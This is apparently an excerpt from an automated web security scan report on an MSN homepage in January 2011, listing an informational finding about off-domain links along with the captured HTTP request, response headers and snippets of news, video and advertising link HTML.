<a href="http://wonderwall.redacted/movies/celeb-inc-for-jan-28-11106.gallery?gt1=28135"><img class="portrait" src="http://col.stb.s-msn.com/i/A2/2888962E701EAAE9359FF470864F30.jpg" title="Image: Nicole Richie (.. George Pimentel/WireImage)" width="116" height="175" alt="Image: Nicole Richie (.. George Pimentel/WireImage)" /></a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy?q=Ryan+Seacrest&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">Ryan Seacrest brings Jimmy Kimmel a special drink</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa?q=The+Bachelor&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">Jay puts 'The Bachelor' in the hot seat</a>
...[SNIP]...
<a href="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=27348235&amp;gt1=32092"><img class="landscape" src="http://col.stb.s-msn.com/i/BE/4A28A4A19E915D6BB1CEF2DE2FCC.jpg" title="Image: Couple playing video game (.. Jose Luis Pelaez Inc/Getty Images) " width="303" height="117" alt="Image: Couple playing video game (.. Jose Luis Pelaez Inc/Getty Images) " /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/69/3BC6B191E1FEB96B64CBE43BD6C79.jpg" title="Image: Video still of bride Syndal Gorden (.. TLC) " width="128" height="73" alt="Image: Video still of bride Syndal Gorden (.. TLC) " /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007">Dress-shopping</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/emotional-race/17w5pcxcn?q=the+bachelor&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">Video: Watch a sneak peek of Monday's 'Bachelor' </a>
...[SNIP]...
<li class="ter"><a href="http://msn.chemistry.com/cp/landing/57269?trackingid=516068&amp;bannerid=2117936&amp;gt1=26000">Take a quiz &amp; get matched with someone like you</a>
...[SNIP]...
<div><a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008"><img class="landscape" src="http://col.stb.s-msn.com/i/A5/79D26D4C8D9DA16339279967F5473.jpg" title="Image: Video still of Dana Carvey (.. NBC)" width="303" height="117" alt="Image: Video still of Dana Carvey (.. NBC)" /></a></div><div><a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">Carvey lobbied for Schwarzenegger</a>
...[SNIP]...
<p>Video: The comedian <a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">recalls his campaigning days</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008"><img class="landscape" src="http://col.stb.s-msn.com/i/90/FB7888CDDECEAEF33752C48C04286.jpg" title="Image: Video still of Anthony Hopkins (.. ABC)" width="128" height="73" alt="Image: Video still of Anthony Hopkins (.. ABC)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008"><strong>
...[SNIP]...
<p>The actor tells Kimmel of his friendship with <a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">Randy Jackson.</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/CD/70685892D9EC978E450FF891858.jpg" title="Image: Video still of baby screaming (.. StupidVideos)" width="128" height="73" alt="Image: Video still of baby screaming (.. StupidVideos)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007"><strong>
...[SNIP]...
<p>Video: <a href="http://www.bing.com/videos/watch/video/baby-shows-his-war-face/20iqdwae?q=Baby+Cry&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007">Game on</a>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&amp;from=en-us_msnhp"><img class="landscape" src="http://col.stb.s-msn.com/i/FB/39B57119E113EAC72C86F212549.jpg" title="Image: 'Rio' (.. 20th Century Fox)" width="128" height="73" alt="Image: 'Rio' (.. 20th Century Fox)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv?form=ETMONA&amp;from=en-us_msnhp"><strong>
...[SNIP]...
<div style="float:left;width:128px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers"><img class="landscape" src="http://col.stb.s-msn.com/i/A6/6401E4B948C6DA838C385E3FAD9FC.jpg" title="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" width="128" height="73" alt="Image: Businesswoman on computer screen (.. Bernhard Lang/Getty Images)" /></a></div><div style="margin-left:128px; padding-left: 10px"><a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers"><strong>
...[SNIP]...
<p>How <a href="http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers">video is replacing</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/?SiteId=cbmsnjm41951&amp;sc_extcmp=JS_1951_jobmod">Get paid to socially network</a>
...[SNIP]...
<li class="ter"><a href="http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/#more-6495/?cobrand=msn&amp;utm_source=MSN&amp;utm_medium=MSNJM&amp;utm_campaign=MSNCareers">Your work soundtrack</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/?SiteId=cbmsnjm41302&amp;sc_extcmp=JS_1302_jobmod">Excuse-free time off</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/?SiteId=cbmsnjm41391&amp;sc_extcmp=JS_1391_jobmod">9 questions you should ask your boss</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/?SiteId=cbmsnjm42469&amp;sc_extcmp=JS_2469_jobmod">Job advice that was true 20 years ago</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=job+interview+makeup&amp;form=ap&amp;gt1=36010">Bing: Got an interview? Get makeup tips</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+live+on+a+tight+budget&amp;form=ap&amp;gt1=36010">Search: How to live on a tight budget</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/search?q=how+to+get+the+job+of+your+dreams&amp;form=ap&amp;gt1=36010">Find: How to get your dream job</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON"><img class="landscape" src="http://col.stb.s-msn.com/i/A8/EAAC5AEEA4675FAFFCE4F81A2F97C.jpg" title="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" width="128" height="73" alt="Image: Boats in harbor, Bandon, Ore. (Courtesy Wood Sabolt)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON"><strong>
...[SNIP]...
<p>Bigger isn't always better in these <a href="http://www.bing.com/travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&amp;cid=msn1162079&amp;FORM=TRVCON">fun, hip burgs</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Hawaiian+Islands%3a+Best+for+Gorgeous+Beaches&amp;cid=msntab1162226&amp;FORM=TRVCON">Which Hawaiian Island is right for you?</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=World's+Coolest+Hot+Springs%3a+The+Blue+Lagoon%2c+Iceland&amp;cid=msntab1174865&amp;FORM=TRVCON">Coolest hot springs around the globe</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Underground+Attractions%3a+Cu+Chi+Tunnels%2c+Vietnam&amp;cid=msntab1173638&amp;FORM=TRVCON">15 unusual underground attractions</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=37+Secrets+of+the+Caribbean&amp;cid=msntab1172106&amp;Form=TRVCON">37 steals &amp; deals for the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do?cid=msn_tab&amp;form=trvcon">Cheap flights to the Caribbean</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&amp;qpvt=hawaii+hotels&amp;cid=msn_tab&amp;form=trvcon">Hotel deals in Honolulu</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/last-minute-flight-deals.do?cid=msn_tab&amp;form=trvcon">Last-minute flights on the cheap</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&amp;form=trvcon">Find the perfect hotel</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/maps/explore/?org=aj&amp;FORM=Z9LH9#">Bing Maps: Where do you want to go next?</a>
...[SNIP]...
<a href="http://appetiteforlife.redacted/?section=episodes&amp;content=2&amp;source=msn&amp;from=en-us_msnhp&amp;GT1=25052"><img src="http://col.stb.s-msn.com/i/69/38A7E111C7E3A98263F6658E7063D2.jpg" title="Image: Video still of Andrew Zimmern (.. Reveille/Microsoft)" width="75" height="128" alt="Image: Video still of Andrew Zimmern (.. Reveille/Microsoft)" /></a>
...[SNIP]...
<a href="http://g.redacted/AIPRIV/en-us" class="adch"><img src="http://col.stc.s-msn.com/br/sc/i/icons/adchoices_gif.gif" alt="Ad Choice" title="Ad Choice" height="12" width="68" /></a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home">Advertise</a>
...[SNIP]...
<li><a href="https://careers.microsoft.com/">Jobs</a>
...[SNIP]...
<li><a class="opennew" href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...

22.431. http://www.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?euid=AD04D6F8B2FF44629973BD0674351135&userGroup=D1:default&PM=z:1 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://www.redacted/
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.redacted
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; stvx=gendermodule:forher

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:49:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA25
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 44406
Content-Length: 44406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><body><d
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&amp;mkt=en-us&amp;FORM=MSNHPT">Sunday, January 30, 2011</a>
...[SNIP]...
<div><a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002"><img src="http://col.stb.s-msn.com/i/3E/3E32A65A54765E9193E7946B7F64.jpg" title="Image: File photo of Lynn Swann of the Pittsburgh Steelers as he catches a pass during Super Bowl X (.. AP)" width="303" height="211" alt="Image: File photo of Lynn Swann of the Pittsburgh Steelers as he catches a pass during Super Bowl X (.. AP)" /></a>
...[SNIP]...
<span><a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002">The 10 Best Plays in Super Bowl History </a>
...[SNIP]...
<p>Remember Marcus Allen's touchdown run or Lynn Swann's catch? Check out the big game's <a href="http://msn.foxsports.com/nfl/lists/Top-10-Super-Bowl-Best-Plays?GT1=39002">best plays</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl?GT1=39028">Complete Super Bowl coverage </a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy/football/big-game-challenge">Take the Big Game Challenge &amp; beat the experts </a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nfl/gameTrax?gameId=20110130032&amp;GT1=39002">Pro Bowl stars collide today in Honolulu </a>
...[SNIP]...
<a href="http://glo.redacted/beauty/color-combo-6391.gallery?gt1=49036"><img src="http://col.stb.s-msn.com/i/DF/749E3611476657BDEDA1876151B3D.jpg" title="Image: (From left) Demi Moore &amp; Rihanna (.. Gabriel Bouys/AFP/Getty Images; Mark Ralston/AFP/Getty Images)" width="303" height="211" alt="Image: (From left) Demi Moore &amp; Rihanna (.. Gabriel Bouys/AFP/Getty Images; Mark Ralston/AFP/Getty Images)" /></a>
...[SNIP]...
<a href="http://money.msn.com/saving-money/compare-income-debt-savings.aspx?GT1=33021"><img src="http://col.stb.s-msn.com/i/51/E28E2C88338D867AE51A2853768E.jpg" title="Image: Woman looking over fence (.. Charles Gullung/Getty Images)" width="303" height="211" alt="Image: Woman looking over fence (.. Charles Gullung/Getty Images)" /></a>
...[SNIP]...
<a href="http://realestate.redacted/article.aspx?cp-documentid=26648468&amp;GT1=35009"><img src="http://col.stb.s-msn.com/i/D8/6F79BE19ECC2D234C2E9F8B51365.jpg" title=" Image: Women playing pool &amp; darts (.. Louis Turner/Getty Images; Caroline Schiff/Getty Images) " width="303" height="211" alt=" Image: Women playing pool &amp; darts (.. Louis Turner/Getty Images; Caroline Schiff/Getty Images) " /></a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=mom+cave+essentials&amp;form=msnhed&amp;GT1=36010">Bing: Essentials for your mom cave </a>
...[SNIP]...
<span><a href="http://www.bing.com/videos/watch/video/wart-hog-warriors/pmxl7g0?q=Animal+Planet&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42006">Videos: Animals on the Attack </a>
...[SNIP]...
<li style="width:206px;" class="first"><a href="http://www.bing.com/videos/watch/video/wart-hog-warriors/pmxl7g0?q=Animal+Planet&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42006"><img src="http://col.stb.s-msn.com/i/8D/E0998F7A3F51B4EE9CA9E669DD865.jpg" title=" Image: Video still of warring warthogs (.. Animal Planet) " width="206" height="144" alt=" Image: Video still of warring warthogs (.. Animal Planet) " /></a><a href="http://www.bing.com/videos/watch/video/wart-hog-warriors/pmxl7g0?q=Animal+Planet&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42006">Warring warthogs fond of fighting </a>
...[SNIP]...
<li style="width:206px;"><a href="http://www.bing.com/videos/watch/video/untamed-and-uncut-baby-wins-rhino-fight/pexxh15?q=Rhino&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42006"><img src="http://col.stb.s-msn.com/i/66/C6BBA80994D7B938E61E7E4EFDAA5.jpg" title="Image: Video still of baby rhino chasing away aggressive male (.. Animal Planet)" width="206" height="144" alt="Image: Video still of baby rhino chasing away aggressive male (.. Animal Planet)" /></a><a href="http://www.bing.com/videos/watch/video/untamed-and-uncut-baby-wins-rhino-fight/pexxh15?q=Rhino&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42006">Baby rhino races to mom's rescue </a>
...[SNIP]...
<li style="width:206px;" class="last"><a href="http://www.bing.com/videos/watch/video/fierce-giraffe-battle-caught-on-video/p40567i?q=Animal+battle&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42006"><img src="http://col.stb.s-msn.com/i/48/12578C8D1EA6531FBD7D7466FA79C.jpg" title="Image: Video still of fighting male giraffes (.. Animal Planet)" width="206" height="144" alt="Image: Video still of fighting male giraffes (.. Animal Planet)" /></a><a href="http://www.bing.com/videos/watch/video/fierce-giraffe-battle-caught-on-video/p40567i?q=Animal+battle&amp;rel=msn&amp;from=en-us_msnhp&amp;form=msnrll&amp;gt1=42006">Angry giraffes caught necking </a>
...[SNIP]...
<a href="http://www.msnbc.redacted/id/21134540/vp/41326711#41326711?from=en-us_msnhp&amp;gt1=43001"><img class="landscape" src="http://col.stb.s-msn.com/i/9F/2177C83925E3767FB9AC282991F22.jpg" title="Image: Video still of Rebecca Williams (.. NBC)" width="303" height="117" alt="Image: Video still of Rebecca Williams (.. NBC)" /></a>
...[SNIP]...
<li class="ter"><a href="http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&amp;feedID=3698&amp;gt1=39002">No limits for one-legged wrestler</a>
...[SNIP]...
<li class="ter"><a href="http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never?gt1=43001">Americans cheat on taxes? Never</a>
...[SNIP]...
<div><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&amp;cid=msn1176778&amp;FORM=TRVCON&amp;GT1=41000"><img class="landscape" src="http://col.stb.s-msn.com/i/5B/EB40EDC3981E79258ECE32F53B8D76.jpg" title="Image: Woman crossing a bridge on the Wild Africa Trek, Disney's Animal Kingdom, Walt Disney World Resort, Fla. (.. Kent Phillips/Disney)" width="303" height="117" alt="Image: Woman crossing a bridge on the Wild Africa Trek, Disney's Animal Kingdom, Walt Disney World Resort, Fla. (.. Kent Phillips/Disney)" /></a></div><div><a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&amp;cid=msn1176778&amp;FORM=TRVCON&amp;GT1=41000">Disney's happiest places on Earth </a>
...[SNIP]...
<p>The vacation giant has global tours, cruises &amp; famous parks. Which of these <a href="http://www.bing.com/travel/content/search?q=New+in+Disney+Travel%3a+Alaska+Cruises&amp;cid=msn1176778&amp;FORM=TRVCON&amp;GT1=41000">13 adventures should you take</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&amp;cid=msn1176921&amp;FORM=TRVCON&amp;gt1=41000"><img class="landscape" src="http://col.stb.s-msn.com/i/BA/C029CA31B84EE7CFCB17C349435C.jpg" title="Image: Cloister of Parador de Santiago de Compostela, Spain (.. Nik Wheeler/Corbis)" width="128" height="73" alt="Image: Cloister of Parador de Santiago de Compostela, Spain (.. Nik Wheeler/Corbis)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&amp;cid=msn1176921&amp;FORM=TRVCON&amp;gt1=41000"><strong>
...[SNIP]...
<p>If hotels could talk, what stories they could tell. Check out these <a href="http://www.bing.com/travel/content/search?q=Hotels+With+a+Past%3a+Cadogan+Hotel%2c+London&amp;cid=msn1176921&amp;FORM=TRVCON&amp;gt1=41000">12 hotels with a past</a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=6+Great+Reasons+to+Visit+New+York+This+Year&amp;cid=msn1177192&amp;form=TRVCON&amp;gt1=41000">6 great reasons to visit New York this year </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/content/search?q=Ask+Trip+Coach%3a+Top+Tips+for+Traveling+With+Your+Pet&amp;cid=msn1177190&amp;form=TRVCON&amp;gt1=41000">Tips for traveling with your pet </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msn_tab&amp;form=trvcon&amp;gt1=41000">Leave winter behind: Find great flight deals </a>
...[SNIP]...
<li class="ter"><a href="http://www.bing.com/travel/hotels?cid=msn_tab&amp;form=trvcon&amp;gt1=41000">Find a hotel for your next getaway </a>
...[SNIP]...
<a href="http://glo.redacted/living/superbowl-kids-bash-6426.gallery?gt1=49037"><img class="landscape" src="http://col.stb.s-msn.com/i/6E/A94D44FE6D02377F5C4F609DC03F.jpg" title="Image: Various treats for football party (Courtesy of shindigparties)" width="303" height="117" alt="Image: Various treats for football party (Courtesy of shindigparties)" /></a>
...[SNIP]...
<a href="http://glo.redacted/style/10-winter-style-essentials-6421.gallery?gt1=49006"><img class="landscape" src="http://col.stb.s-msn.com/i/F8/81185586C353EC6EA7CB7985B625C.jpg" title="Image: Bubble jacket &amp; gloves (Courtesy of Ann Taylor; Kohl's)" width="128" height="73" alt="Image: Bubble jacket &amp; gloves (Courtesy of Ann Taylor; Kohl's)" /></a>
...[SNIP]...
<a href="http://glo.redacted/relationships/caroline-rules-1534096.story?gt1=49006"><img class="landscape" src="http://col.stb.s-msn.com/i/80/EA261A55FB948339E67F47051B4F6.jpg" title="Image: Woman looking in mirror (.. Tim Scott/Getty Images)" width="128" height="73" alt="Image: Woman looking in mirror (.. Tim Scott/Getty Images)" /></a>
...[SNIP]...
<div style="float:right;width:116px"><a href="http://msn.foxsports.com/tennis/story/novak-djokovic-beats-andy-murray-wins-second-australian-open-title-013011"><img class="portrait" src="http://static.foxsports.com/content/fscom/img/2011/01/30/djokovic_20110130064153395_116_175.JPG" width="116" height="175" alt="Image: Novak Djokovic (Rob Griffith/AP photo)" /></a></div><div style="margin-right:116px; padding-right: 10px;"><a href="http://msn.foxsports.com/tennis/story/novak-djokovic-beats-andy-murray-wins-second-australian-open-title-013011">Djokovic wins second Aussie Open title</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/golf/leaderboard">Live: Mickelson has win in sight at Torrey Pines</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nba/page/heat-or-threepeat">Will laziness be Lakers' downfall?</a><span class="piped"> | <a href="http://www.foxsportswest.com/msn/01/28/11/Nothing-Better-than-Lakers-Celtics/landing_moneytalks.html?blockID=399756&amp;feedID=5319">Best rivalry is ...</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/nfl/story/Porn-Super-Bowl-Green-Bay-Packers-012911">Packer has to choose: Super Bowl or 'Porn Sunday'</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/collegebasketball/scores">It's upset madness in wild day of college hoops</a>
...[SNIP]...
<li class="ter"><a href="http://www.foxsportssouthwest.com/msn/01/29/11/Former-Dallas-Cowboy-Herschel-Walker-imp/landing.html?blockID=400443&amp;feedID=3742">Ex-NFL star continues to find MMA success</a>
...[SNIP]...
<li class="ter"><a href="http://msn.foxsports.com/mlb/story/Martin-Luther-King-III-looking-to-buy-New-York-Mets-012911">Martin Luther King III looking to purchase MLB team</a>
...[SNIP]...
<li class="ter"><a href="http://recruiting.scout.com/2/1043469.html">Sanctions haven't slowed Southern Cal's recruiting</a>
...[SNIP]...
<a href="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=27348235&amp;gt1=32092"><img class="landscape" src="http://col.stb.s-msn.com/i/BE/4A28A4A19E915D6BB1CEF2DE2FCC.jpg" title="Image: Couple playing video game (.. Jose Luis Pelaez Inc/Getty Images) " width="303" height="117" alt="Image: Couple playing video game (.. Jose Luis Pelaez Inc/Getty Images) " /></a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007"><img class="landscape" src="http://col.stb.s-msn.com/i/69/3BC6B191E1FEB96B64CBE43BD6C79.jpg" title="Image: Video still of bride Syndal Gorden (.. TLC) " width="128" height="73" alt="Image: Video still of bride Syndal Gorden (.. TLC) " /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/videos/watch/video/baseball-bride/p67zd1w?q=Chad+Gaudin&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&gt;=42007">Dress-shopping</a>
...[SNIP]...
<li class="ter media"><a href="http://www.bing.com/videos/watch/video/emotional-race/17w5pcxcn?q=the+bachelor&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">Video: Watch a sneak peek of Monday's 'Bachelor' </a>
...[SNIP]...
<li class="ter"><a href="http://msn.chemistry.com/cp/landing/57269?trackingid=516068&amp;bannerid=2117936&amp;gt1=26000">Take a quiz &amp; get matched with someone like you</a>
...[SNIP]...
<div><a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008"><img class="landscape" src="http://col.stb.s-msn.com/i/A5/79D26D4C8D9DA16339279967F5473.jpg" title="Image: Video still of Dana Carvey (.. NBC)" width="303" height="117" alt="Image: Video still of Dana Carvey (.. NBC)" /></a></div><div><a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">Carvey lobbied for Schwarzenegger</a>
...[SNIP]...
<p>Video: The comedian <a href="http://www.bing.com/videos/watch/video/dana-carvey-part-3/17wmu6ei0?q=Dana+Carvey&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008">recalls his campaigning days</a>
...[SNIP]...
<div style="float:right;width:128px"><a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008"><img class="landscape" src="http://col.stb.s-msn.com/i/90/FB7888CDDECEAEF33752C48C04286.jpg" title="Image: Video still of Anthony Hopkins (.. ABC)" width="128" height="73" alt="Image: Video still of Anthony Hopkins (.. ABC)" /></a></div><div style="margin-right:128px; padding-right: 10px"><a href="http://www.bing.com/videos/watch/video/anthony-hopkins-part-2/17we349d6?q=Anthony+Hopkins&amp;rel=msn&amp;from=en-us_msnhp&amp;form=MSNRLL&amp;gt1=42008"><strong>
...[SNIP]...
